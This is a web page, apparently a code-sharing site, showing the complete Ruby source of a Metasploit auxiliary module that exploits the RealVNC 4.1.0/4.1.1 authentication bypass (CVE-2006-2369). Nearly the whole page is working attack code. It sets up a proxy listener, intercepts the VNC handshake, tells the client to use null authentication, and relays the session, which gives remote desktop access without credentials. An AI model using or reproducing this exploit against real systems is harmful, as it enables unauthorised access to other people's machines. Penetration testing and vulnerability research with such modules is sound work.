扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 |
## # $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'RealVNC Authentication Bypass', 'Description'=> %q{ This module exploits an Authentication Bypass Vulnerability in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy listener on LPORT and proxies to the target server The AUTOVNC option requires that vncviewer be installed on the attacking machine. This option should be disabled for Pro }, 'Author' => [ 'hdm', #original msf2 module 'TheLightCosine <thelightcosine[at]gmail.com>' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 13641 $', 'References' => [ ['BID', '17978'], ['OSVDB', '25479'], ['URL', 'http://secunia.com/advisories/20107/'], ['CVE', 'CVE-2006-2369'], ], 'DisclosureDate' => 'May 15 2006')) register_options( [ OptAddress.new('RHOST', [true, 'The Target Host']), OptPort.new('RPORT',[true, "The port the target VNC Server is listening on", 5900 ]), OptPort.new('LPORT',[true, "The port the local VNC Proxy should listen on", 5900 ]), OptBool.new('AUTOVNC',[true, "Automatically Launch vncviewer from this host", true]) ], self.class) end def run #starts up the Listener Server print_status("starting listener") listener = Rex::Socket::TcpServer.create( 'LocalHost' => '0.0.0.0', 'LocalPort' => datastore['LPORT'], 'Context' => { 'Msf' => framework, 'MsfExploit' => self } ) #If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine #targetting the proxy listener. if (datastore['AUTOVNC']) unless (check_vncviewer()) print_error("vncviewer does not appear to be installed, exiting!!!") return nil end print_status("Spawning viewer thread") view = framework.threads.spawn("VncViewerWrapper", false) { system("vncviewer 127.0.0.1::#{datastore['LPORT']}") } end #Establishes the connection between the viewier and the remote server client = listener.accept add_socket(client) s = Rex::Socket::Tcp.create( 'PeerHost' => datastore['RHOST'], 'PeerPort' => datastore['RPORT'], 'Timeout' => 1 ) add_socket(s) serverhello = s.gets unless serverhello.include? "RFB 003.008" print_error("The VNCServer is not vulnerable") return end #MitM attack on the VNC Authentication Process client.puts(serverhello) clienthello = client.gets s.puts(clienthello) authmethods = s.recv(2) print_status("Auth Methods Recieved. Sending Null Authentication Option to Client") client.write("\x01\x01") client.recv(1) s.write("\x01") s.recv(4) client.write("\x00\x00\x00\x00") #handles remaining proxy operations between the two sockets closed = false while(closed == false) sockets =[] sockets << client sockets << s selected = select(sockets,nil,nil,0) #print_status ("Selected: #{selected.inspect}") unless selected.nil? if selected[0].include?(client) #print_status("Transfering from client to server") begin data = client.sysread(8192) if data.nil? print_error("Client Closed Connection") closed = true else s.write(data) end rescue print_error("Client Closed Connection") closed = true end end if selected[0].include?(s) #print_status("Transfering from server to client") begin data = s.sysread(8192) if data.nil? print_error("Server Closed Connection") closed = true else client.write(data) end rescue closed = true end end end end #Garbage Collection s.close client.close print_status("Listener Closed") if (datastore['AUTOVNC']) view.kill print_status("Viewer Closed") end end def check_vncviewer vnc = Rex::FileUtils::find_full_path('vncviewer') || Rex::FileUtils::find_full_path('vncviewer.exe') if (vnc) return true else return false end end end |
体验盒子
